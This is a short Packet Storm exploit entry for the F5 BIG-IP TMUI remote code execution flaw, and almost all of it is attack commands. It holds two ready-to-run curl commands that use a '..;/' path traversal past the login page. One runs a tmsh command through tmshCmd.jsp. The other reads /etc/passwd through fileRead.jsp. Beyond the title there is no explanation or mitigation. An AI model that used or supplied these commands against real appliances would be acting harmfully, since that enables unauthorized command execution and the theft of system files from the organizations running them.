BIG-IP TMUI Remote Code Execution

2020-07-07T00:00:00
ID PACKETSTORM:158333
Type packetstorm
Reporter Budi Khoirudin
Modified 2020-07-07T00:00:00

Description

                                        
                                            `## RCE:   
  
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'  
  
## Read File:   
  
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'  
  
`